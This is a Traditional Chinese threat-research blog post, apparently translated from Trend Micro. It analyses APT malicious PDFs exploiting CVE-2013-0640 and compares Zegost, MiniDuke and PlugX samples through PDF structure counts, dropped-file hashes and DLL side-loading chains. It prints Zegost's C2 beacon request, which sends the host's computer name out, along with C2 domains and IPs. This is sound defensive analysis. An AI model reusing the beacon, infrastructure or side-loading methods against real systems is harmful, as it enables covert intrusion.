APT 攻擊藉由惡意PDF攻擊程式碼大量增加中

在2012年裡,我們看到了各式各樣的APT攻擊活動利用Microsoft Word的漏洞 – CVE-2012-0158。這是一種轉變,之前最常被利用的Word漏洞是CVE-2010-3333。雖然我們還是繼續看到CVE-2012-0158被大量的使用,不過我們也注意到惡名昭彰的「MiniDuke」攻擊所製造針對Adobe Reader漏洞 – CVE-2013-0640的攻擊程式碼使用量的增加。這些惡意PDF檔案所植入的惡意軟體和MiniDuke並無關聯,但卻和正在進行中的APT-進階持續性滲透攻擊 (Advanced Persistent Threat, APT)活動有關。

APT 攻擊藉由惡意PDF攻擊程式碼大量增加中
APT 攻擊藉由惡意PDF攻擊程式碼大量增加中

Zegost

趨勢科技所發現的一組惡意PDF檔案,藏有上述漏洞攻擊碼的誘餌文章使用的是越南文,檔案名稱也是相同的語言。

APT 攻擊藉由惡意PDF攻擊程式碼大量增加中
圖一、誘餌文件樣本

這些PDF檔案內嵌著和MiniDuke攻擊活動所使用類似的JavaScript程式碼。相似之處包括了類似的函數和變數名稱。

APT 攻擊藉由惡意PDF攻擊程式碼大量增加中
圖二、類似的JavaScript程式碼

使用Didier Steven的PDFiD工具來分析這PDF檔案,顯示出這兩個PDF檔案非常相似。雖然並非完全相同,但兩者之間的相似之處是難以否認的。有意思的地方是「/Javascript」、「/OpenAction」和「/Page」。這些地方代表著有JavaScript出現,有某種自動行為出現和頁碼。這三個項目可以幫我們確認MiniDuke和Zegost的相似之處。

植入的檔案和資料也差不多。這兩種攻擊活動都植入相同數量的檔案,有著非常相似的檔案名稱與類似的目的。即使註冊表的修改部分也很類似。

不過這也是相似的全部地方。這些PDF所植入的檔案被稱為Zegost(或HTTPTunnel),曾經在之前的攻擊裡被發現過。和MiniDuke攻擊所植入的惡意軟體並無關聯。Zegost惡意軟體有個鮮明的特徵:

GET /cgi/online.asp?hostname=[COMPUTERNAME]&httptype=[1][not%20httptunnel] HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)

Host: dns.yimg.ca

Cache-Control: no-cache

命令和控制伺服器 – dns.yimg.ca所反查出的IP – 223.26.55.122,一直被用在比較知名的命令和控制伺服器上,像是imm.conimes.comiyy.conimes.com。用來註冊這網域的電子郵件地址 – llssddzz@gmail.com,也被用來註冊scvhosts.com(另外一個已知的C&C伺服器器)和updata-microsoft.com,應該也是有問題的網域。

PlugX (客製化的遠端存取工具, 針對臺灣在內特定目標發動 APT 攻擊))

第二組的惡意PDF檔案間並不一定都直接有關連,雖然它們都會值入不同的PlugX變種。我們所分析的攻擊似乎針對著日本、韓國和印度的目標。

然而,雖然這些攻擊也是利用漏洞 – CVE-2013-0640,但是它們和上面所討論的樣本不同。比較檔案時就可以看出差異,比方說使用的PDF格式版本:

Zegost

MiniDuke

PlugX

 PDF Header: %PDF-1.4  PDF Header: %PDF-1.4  PDF Header: %PDF-1.7
 obj                    8  obj                    8  obj                   43
 endobj                 8  endobj                 8  endobj                44
 stream                 3  stream                 1  stream                10
 endstream              3  endstream              2  endstream             11
 xref                   1  xref                   1  xref                   4
 trailer                1  trailer                1  trailer                4
 startxref              1  startxref              1  startxref              4
 /Page                  1  /Page                  1  /Page                  6
 /Encrypt               0  /Encrypt               1  /Encrypt               0
 /ObjStm                0  /ObjStm                0  /ObjStm                0
 /JavaScript            1  /JavaScript            1  /JavaScript            1
 /AA                    0  /AA                    0  /AA                    0
 /OpenAction            1  /OpenAction            1  /OpenAction            1
 /AcroForm              1  /AcroForm              1  /AcroForm              1
 /JBIG2Decode           0  /JBIG2Decode           0  /JBIG2Decode           0
 /RichMedia             0  /RichMedia             0  /RichMedia             0
 /Launch                0  /Launch                0  /Launch                0
 /EmbeddedFile          0  /EmbeddedFile          0  /EmbeddedFile          0
 /XFA                   1  /XFA                   1  /XFA                   1
 /Colors > 2^24         0  /Colors > 2^24         0  /Colors > 2^24         0

PlugX也會植入檔案和資料,但是卻和Zegost或MiniDuke都不相同。檔案數量不同,植入原因也不同。

Zegost

MiniDuke

PlugX

UserCache.bin UserCache.bin UserCache.bin
39f5d27d1a5e34ce9863406b799ef47a 39f5d27d1a5e34ce9863406b799ef47a 39f5d27d1a5e34ce9863406b799ef47a
ACECache10.lst ACECache10.lst ACECache10.lst
a1bb36552f1336466b4d728948393585 77402ee32c656d68eeb8a07e2a041dfb 77e16369d995628ff9df31c56129a2f2
A9RD50B.tmp (PDF) A9RE077.tmp (PDF) SharedDataEvents
dd28e2e06465464f0cb5eca4a9013421 85b890c0b10faa13014d4a22dae3fe3c 1a8d23271be2c45f31a537eaefbbf55d
A9RD50A.tmp (PDF) A9RE078.tmp (PDF) SharedDataEvents-journal
4f4ceedd8da84be88dbea7b49f1b82e5 e719894252665a7cbf8efc18babdd70e 4754e6d5ea3b6ca2357146a1e56c3c47
SharedDataEvents-journal
b16f24e72c42059cd44a9fb48ea8bf98
A9RD53D.tmp (PDF)
200569e47e6e5a3f629533423d4ba03b
SharedDataEvents-journal
b930ef3a77e6c4669312f582fc405f61
SharedDataEvents-journal
38149cfb66075a9009d460e86c138141
SharedDataEvents-journal
566ea4be505009d422d5fd6c395a33b9
A9RD53C.tmp (PDF)
ca79b7a45410dd1e995a4997dcc6d126

PlugX:HHX

PlugX的第一組變種會利用Microsoft HTML輔助說明編譯器,就如同這篇文章內所描述的一樣。我們已經看到這變種被用在目標攻擊內。在這案例中,攻擊者對目標發送了一封電子郵件,以誘使他們打開惡意附加檔案。

我們所分析的樣本會將檔案植入資料夾 – hhx內,並且利用正常的Microsoft檔案 – hhx.exe去載入hha.dll,接著再載入hha.dll.bak。我們所分析檔案所使用的命令和控制伺服器是14.102.252.142。

PlugX:PDH

我們所分析的第二組PlugX變種,會將檔案植入到資料夾 – PDH內,並且利用已經簽證過的QQ瀏覽器更新服務檔案來載入PDH.dll,接著會載入PDH.pak。

圖三、簽證過的檔案

這些檔案利用dnsport.chatnook.cominter.so-webmail.com和223.25.242.45做為命令和控制伺服器。

結論

趨勢科技的研究顯示這些APT-進階持續性滲透攻擊 (Advanced Persistent Threat, APT)活動的攻擊者開始利用MiniDuke攻擊活動所製造的漏洞攻擊碼,並將其加入到他們的軍火庫中。在這同時,我們也發現似乎有其他APT攻擊活動已經開發出自己的方式來利用相同的漏洞。攻擊漏洞 – CVE-2013-0640的惡意PDF數量增加,也代表了APT攻擊者從使用惡意Word檔案攻擊相對老舊的漏洞 – CVE-2012-0158開始轉移陣地了。

@原文出處:Malicious PDFs On The Rise作者:Nart Villeneuve(資深威脅研究員)

 

想了解更多關於網路安全的秘訣和建議,只要到趨勢科技粉絲網頁 或下面的按鈕按讚

◎延伸閱讀

五個給小型企業關於雲端運算的迷思與事實

《趨勢專家談雲端運算》VMworld的熱門話題:為什麼安全團隊喜歡虛擬化桌面架構

八個令人無法苟同的雲端迷思

小型企業是網路犯罪者的大事業-每個小型企業都應知道的五件關於網路犯罪的事

小型企業的雲端之路,到頭來還是回到原點

超神準的算命大師如何用雲端展開讀心術?!(影片)

保護您邁向雲端之路的 10 個步驟

巨量資料分析和主動式雲端截毒技術

關於雲端之旅的六個好處和風險(2012年趨勢科技雲端安全調查)

虛擬化的無代理防護也適用於雲端嗎?

會攻擊VMware虛擬機器的新病毒:Crisis(又稱為Morcut)

Cirsis/MORCUT 惡意軟體掛載虛擬機器

《趨勢專家談雲端運算》軟體定義網路重新洗牌:VMware收購Nicira,Oracle收購Xsigo

《趨勢專家談雲端運算》墮入虛擬化相關威脅的深淵

◎ 歡迎加入趨勢科技社群網站